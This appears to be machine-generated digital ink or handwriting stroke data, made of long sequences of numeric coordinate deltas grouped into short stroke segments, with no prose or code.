121,6-5-122,7-19 7,-1 0-1,1 1 0,0-1 1,0 1-1,-1-1 1,1 0-1,-1 1 0,1-1 1,-1 0-1,0 0 0,1 1 1,-1-1-1,0 0 1,0 0-1,-2 2 0,3-3 1,-1 1 0,1-1-1,0 1 1,0-1-1,-1 0 1,1 1 0,0-1-1,0 1 1,-1-1-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,1 0-1,-2 10-1,0-10 0,0-1-1,0 1 1,0-1 0,1 1 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1-1 0,1 1-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 1 0,1 8-4,-12 28 12,11-36-5,0-1-1,-1 0 0,1-1 0,0 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,2 1 0,1 21 6,-2-21-7,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,-3 21-5,4-21 0,-2 11 18,1-11-13,-1 0-1,1 0 0,0 0 1,0 1-1,1-1 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 0,0 1 1,0-1-1,-1 1 0,1 0 1,1-1-1,-1 1 0,0-1 1,0 1-1,0-1 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 1 0,0-1 1,0 0-1,1 3 0,5 14 4,-3-5 26,-3-12-29,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,-1 2 0,34 28 64,-28-23-48,-5-8-16,0 1 0,1-1 1,-1 0-1,0 0 0,1 0 1,-1 1-1,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,1 1-1,-1-1 0,0 0 0,0 1 1,0-1-1,0 0 0,-1 1 1,2 1 1,1 1 1,-1-1-1,0 0 1,1 0 0,-1-1-1,1 1 1,-1 0-1,1 0 1,0-1-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1-1,3 1 1,-4-1 6,1 0 10,32 18-236,-32-18 245,1 1 0,-1-1 1,1 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0-1 0,0 1 1,-1-1-1,6 0 0,-2 2 33,22 2-56,-10-3-45,-12-1 50,0 1-1,0-1 1,0 0 0,0-1 0,0 0 0,0 0 0,10-3-1,58-8-5,-6 6 11,7-31-2,-55 30-19,21-18-1,-38 18 7,-2 4 0,28-10 35,24-41-53,-49 36 60,-2 16-38,0 1-1,-1-1 0,1 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 1,0 0-1,0-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,1-2 0,10-15-91,-1-28 84,-6 41 15,-3 6-10,0 0-1,-1 1 0,1-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,1 0 1,-1 0-1,0 0 0,0 1 0,1-1 1,-1 0-1,0 0 0,0 0 0,0 0 1,0-1-1,11-41-7,-12 34 6,1 7 1,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 1 0,1-1-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 1 0,0-1-1,2-1 1,-2-2 2,1-1 0,-2 1-1,1-1 1,0 1 0,-1-1 0,0 1-1,0-1 1,-2-9 0,1 1-2,-10-16 23,6 12-389,-1-8 736,2 19-361,3 7-9,1-1 1,-1 1-1,1 0 0,0 0 0,-1-1 1,1 1-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,-1-1 0,1 1 1,0-1-1,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,0-2-1,-1 1 3,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,-1-1-1,1 1 1,-1 0-1,1-2 1,-1 3-4,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 1,0 0-1,-1-1 0,1 1 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 0,-10-19-9,7 15 43,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-10-4 0,-18-9 210,29 14-209,0 0 1,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 1 0,0-1-1,1 1 1,0 0 0,-5 1 0,-3 1-409,0 1-1,0 1 1,-17 9-1,-35 22-5246,18-19-5923,35-16 7940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12 312,'0'0'181,"0"0"1,0-1-1,0 1 0,0-1 0,-1 1 1,1 0-1,0-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,0 0 0,-1 0 1,1-1-1,0 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 1 0,0-1 1,-1 0-1,1 0 0,-1 0 1,1 1-104,-1-1 1,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0-1,-1 1 1,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0-139,2-1-1811,-2 0 1689,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0-5-1989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0 140,'0'0'3572,"-2"9"2730,-5 2-5614,4 5 65,-26 14-357,27-26-601,-5 7-76,4-11-375,2-8-703,1-6-4199,0-2 3050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 68,'11'-6'4828,"-13"35"-3424,1-29-1388,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1-1,-1 1 1,1 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 1 0,0 0-2,-13 23 417,-5 5-1,17-29-398,20-37-5230,-17 29 3102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0 112,'0'0'1355,"9"0"-243,-10 1-910,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,0 0 1,-1 0-1,1 0 1,1 3-1,33 4 1242,-31-7-1382,0 0 0,1 0 1,-1 0-1,1-1 1,-1 1-1,1-1 0,-1 0 1,1 1-1,3-2 0,-3 1-33,-1 0-1,1 0 0,-1 0 1,0 0-1,1 1 0,-1-1 1,0 1-1,7 2 0,-6-2-99,0-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 0 0,-1 0 0,0 0-1,6-3 1,23-13-4546,-31 11 2296,-2 0-163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6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36,'10'-17'5902,"-11"19"-5941,0-2 406,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 1,0 0-1,0 1 394,1 10 2336,3-12-3011,-3 0-72,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 1 1,1-1-1,-1 0 1,0 1 0,1-1-1,-1 1 1,0-1-1,0 0 1,1 1-1,30 13 506,-10-5-343,-19-7-168,0 0 1,1-1-1,-1 1 0,1-1 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 0 0,6 0 1,7-1 25,-4-1 21,0 1 1,1 1-1,-1 0 1,14 3-1,-3-3-35,-21-2-17,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1-1,0 0 1,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,1 1 0,32 5 154,58-7 3,-91 0-164,17 4 71,0-1 0,0 0 0,33-1 0,-1-2-161,-50 0 78,44-6 145,-35 6-120,-6-1-10,0 1 0,1-1 1,-1 1-1,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,7 3 0,34-3 115,20-1-95,-15 0-350,-48 0 303,4 3 86,1-1 0,0 0 0,0 0 0,0-1-1,11 1 1,-16-2-26,-1 1-34,0 0-1,0 0 1,1 0-1,-1-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 0 1,-1 0-1,1 1 1,-1-1-1,1 0 1,-1 0-1,1-1 1,-1 1-1,4-1 0,7 1-12,17 7 12,15-2 79,-41-1-36,-2-3-40,-1-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 1,1 0-1,-1 0 0,1 0 0,1 1 0,26 5 271,-26-6-117,32-6 1338,-21 3-1204,-38 0-1624,-27-7-7072,18 2 2507,12 7 2165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9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11 322 112,'0'0'3784,"-11"5"-1543,11-10 717,1-8 1672,7 1-4241,7-23-349,-3 19-62,-3 1 22,-2 10-1,-5 4 3,-1-2 26,-1 1 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0-1,1 0 1,-1 1 0,1-1 0,0 0 0,2-2 0,-1-13 329,1 16-335,-3 0-19,-1 1 1,0 0 0,1 0-1,-1 0 1,0 0-1,1-1 1,-1 1 0,0 0-1,1 0 1,-1-1-1,0 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1 0,0 0-1,0-1 1,-1 0-1,21-16 231,5-18 97,4 10 435,-27 24-688,1-2-56,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,8-3 1,-10 5-4,3-9 90,-5 10-107,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,1 0 1,-1 0-1,0 0 0,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,1-1 0,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 0,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,0 1 1,1-1-1,6-3 69,0 1 0,0 0 0,0 1-1,0 0 1,10-1 0,15-16 96,-21 13-78,10-2-51,-19 7-26,29 11-5,-29-10 11,-2-1 1,-1 3-16,11 5 29,-9-7-15,1-1-5,0 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 1,0 1-1,-1 0 0,1-1 1,0 1-1,-1 0 0,4 2 0,0 0-48,-3-2 52,0 0-2,1 0 1,-1 1-1,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 0,1 2 0,19 8 79,21 7 320,-44-18-411,11 1 4,-9-3 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1-1,0 0 1,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,-1 0 0,1 2 0,-1-2-5,11 6 27,-3 2 14,-7-9-40,0 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 1,0 0-1,-1-1 0,1 1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 2 0,3 2 19,-3-5-18,-1 1 0,1-1-1,-1 0 1,0 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 1 1,0-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 1-1,0-1 1,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,-1 3 9,1-2-10,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,2 1 0,-3-3-2,1 1 0,-1-1 1,0 1-1,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 1,-1 1-1,1-1 0,0 0 0,-1 1 0,1-1 0,-1 1 0,-5 9 50,6-9-46,0-1-5,0 0 1,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-9 11 10,7-10-7,-3 14 20,4-14-22,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 0 1,-1 0-1,1-1 0,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,1 2 0,-1 51 310,0-52-233,1-13 18,0 12-162,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1-1,0 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0-1-1,0 1 1,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0-1 0,0 1 0,-1 0 0,1 0 0,-20-23-6573,14 16 4071,-5-5-1121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0 112,'0'0'721,"9"0"162,-14 2-432,11 2 1658,-15-8-238,11 7-500,5 11 5165,2 4-5190,-9-18-1336,0 0 0,-1 0 0,1 0-1,0 1 1,-1-1 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 0 0,0 1 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1 0,0-1 0,0 1-1,1-1 1,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,1 0 0,0 1 0,3 25 576,-9-16-400,5-10-186,0 0-1,-1 0 1,1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,-1 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,0 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0-1,0-1 1,1 3 9,0-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 1,1 0-1,-1-1 0,-1 1 0,1 0 0,0-1 0,-1 4 1,2 17 88,1-17-83,0 0 0,0-1 0,0 1 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-2 6 0,1 20 86,1-30-88,-11 10 24,11 74-188,0-84 245,-2 48 135,1-47-221,0 0 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 1-1,-1-1 1,1 0 0,1 1 0,-1 3 0,0-1 1,0-4-19,-6 3 11,2 23-29,4 38 108,-1-65-89,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 1,1 1-1,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 1,-1-1-1,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 2 0,0 0 9,0-1-1,0 0-1,1 0 1,-1 0-1,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0-1-1,-1 2 1,1 1 9,0-1 0,1 1-1,-1-1 1,1 1 0,-1-1 0,1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,1 3 0,0 11-47,-1 48 233,0-64-182,0 42 266,0-30-227,0 30-20,0-41-30,0-1 0,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 1,0-1-1,0 1 0,0-1 0,-1 2 0,2-3-1,0 0 0,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,1 0-1,-1 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,-2 1 0,2 17 45,-1 5-23,0-21-11,1 0 1,0 0-1,-1 0 1,1 1-1,0-1 1,1 0-1,-1 1 1,1-1-1,-1 0 1,1 1-1,1 6 0,-1-9-3,0 0 22,0 49 402,0 26 43,0-75-417,-11 29 525,11-24-518,0-5-56,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 1 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 1,1-1-1,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 1,-1 50 1054,2-47-1027,0-3-33,1 0 0,-1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 1,0 0-1,0 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 1,1 0-1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 0,0 0 124,-1 30 1201,1-30-1333,0 1 1,1-1 0,-1 0 0,1 1-1,-1-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,0-1 0,-1 1 0,1 0-1,0-1 1,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0-1,0-1 1,0 2 0,0-1 487,-1-1-481,1 0-1,-1 0 1,1 0-1,0 1 1,-1-1-1,1 0 1,-1 0 0,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 1 0,-1-1-1,1 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0 0 0,-2 26 38,1-26-129,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,0 0-1,-1 1 0,1-1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,-2 1 0,1-1-1948,-2 3-167,-1-3-3125,-14-2-1654,9-4 3433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 1 744,'-11'7'3814,"2"4"-1410,8-11-2249,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 2 0,-11 16 2980,10-15-2895,0 0 0,0 0 1,0 0-1,-1-1 0,1 1 1,-1-1-1,0 1 0,0-1 1,0 0-1,0 1 0,-1-1 1,0 0-1,1 0 0,-5 3 1,4-4-170,0 1 1,0-1-1,0 1 1,0 0 0,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 5 1,-22 27 427,21-32-419,1 2-1,-1-1 1,1 0 0,0 1 0,0 0 0,-4 9 0,5-9 12,-1 0 0,1-1-1,-1 1 1,0 0 0,0-1 0,-8 8 0,-21 29 416,26-36-450,1 1 0,-1 0-1,1 1 1,1-1 0,-6 11-1,6-9-35,-1-1 1,0 0-1,0 0 0,0 0 0,-11 9 0,-18 31 30,4-10 1,22-33-87,9-10-213,3-1-233,-1 9-255,-2-6 121,1 0-1,0 0 0,1 1 0,-1-1 0,1 1 1,0 0-1,-1 0 0,5-4 0,11-13-3315,3-15-2173,-10 16 3099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0 520,'0'0'10624,"2"12"-6249,39 20-1810,-29-28-2426,-1 2-1,0 0 0,0 0 0,0 1 0,-1 0 1,0 1-1,0 0 0,16 18 0,22 16 337,29 30-111,-11-11-24,-55-51-118,-1-1 0,-1 2 0,1-1 0,7 15 0,9 7 69,-20-23-258,-1-3-19,-3-10 118,3-2-170,-3 3-120,-8-5-91,-6-24-3990,-33-34-9038,25 43 9679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73 104,'0'0'692,"-22"-13"3652,22 11-4139,0 0 1,0 0-1,0 0 0,0-1 1,1 1-1,-1 0 1,0 0-1,1 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,1-2-1,-1 3-34,-1 0 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-1 0,0 0 0,0 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,-1 0 0,1 1 0,0-1 0,-1 0 0,0-1-1,-5 0 3065,3 13-3047,3-10-45,3 0-100,-1 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 1 0,-1-1 0,2 4 0,-2-4 0,20 18 245,-16-17-222,0 1 0,-1 1 0,0-1 0,1 0 0,5 10 0,-3-5 62,1 0 0,1-1 0,15 13 0,-20-18-77,6 5 34,-7-6-44,1 0-1,-1 1 0,1-1 0,-1 1 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 0,-1 1 0,0-1 1,0 1-1,0 0 0,3 7 0,-5-8 2,1-1-1,0 1 1,0 0-1,1 0 1,-1-1-1,1 1 1,-1-1-1,1 1 1,0-1-1,0 0 1,0 1-1,2 1 0,-2-2-27,1 0-1,-1 0 1,-1 1-1,1-1 1,0 0-1,0 1 1,-1-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,1 3 0,1-2-23,0-1 0,0 1 0,1-1-1,-1 0 1,1 0 0,6 4-1,-7-6-153,0 1 0,0 0 0,0-1 0,0 0-1,0 1 1,0-1 0,0 0 0,6 0 0,-7-1-86,-1 0-1,0 0 1,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0-1,1 1 1,-1-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0 0,0-1 0,9-8-2463,-9 10 2533,-1 0 1,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1-1,1 1 1,-1-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1-1-1,0-5-2682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22 400 224,'-2'5'1138,"-12"7"7920,10-10-8815,2-2 547,3 0-655,-1 1 1,0-1-1,1 1 1,-1 0-1,1-1 0,-1 1 1,1-1-1,-1 0 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 0 1,-1 1-1,1-1 0,0 0 1,-1 1-1,1-1 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 0,0-1 1,-1 1-1,1 0 1,0 0-1,-1-1 0,2 0 1,28-10 263,-18 3-260,-1-1 1,-1 1-1,1-2 1,16-19-1,-1 1-36,5-3-35,80-72 101,-46 47-65,-42 35-15,0 0-1,2 2 0,33-21 0,-42 29-71,-13 9-19,-1-1 1,1 1-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 1 0,6-2-1,-7 3-15,-2 1-196,0 0 98,0 0 0,0-1 0,0 1 0,0 0 1,0-1-1,0 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-2 0 0,-30-3-6989,18 2 4332,2 1-492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1 208,'-4'3'18651,"1"1"-14872,-1 1-5152,5-5 1399,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,1-1 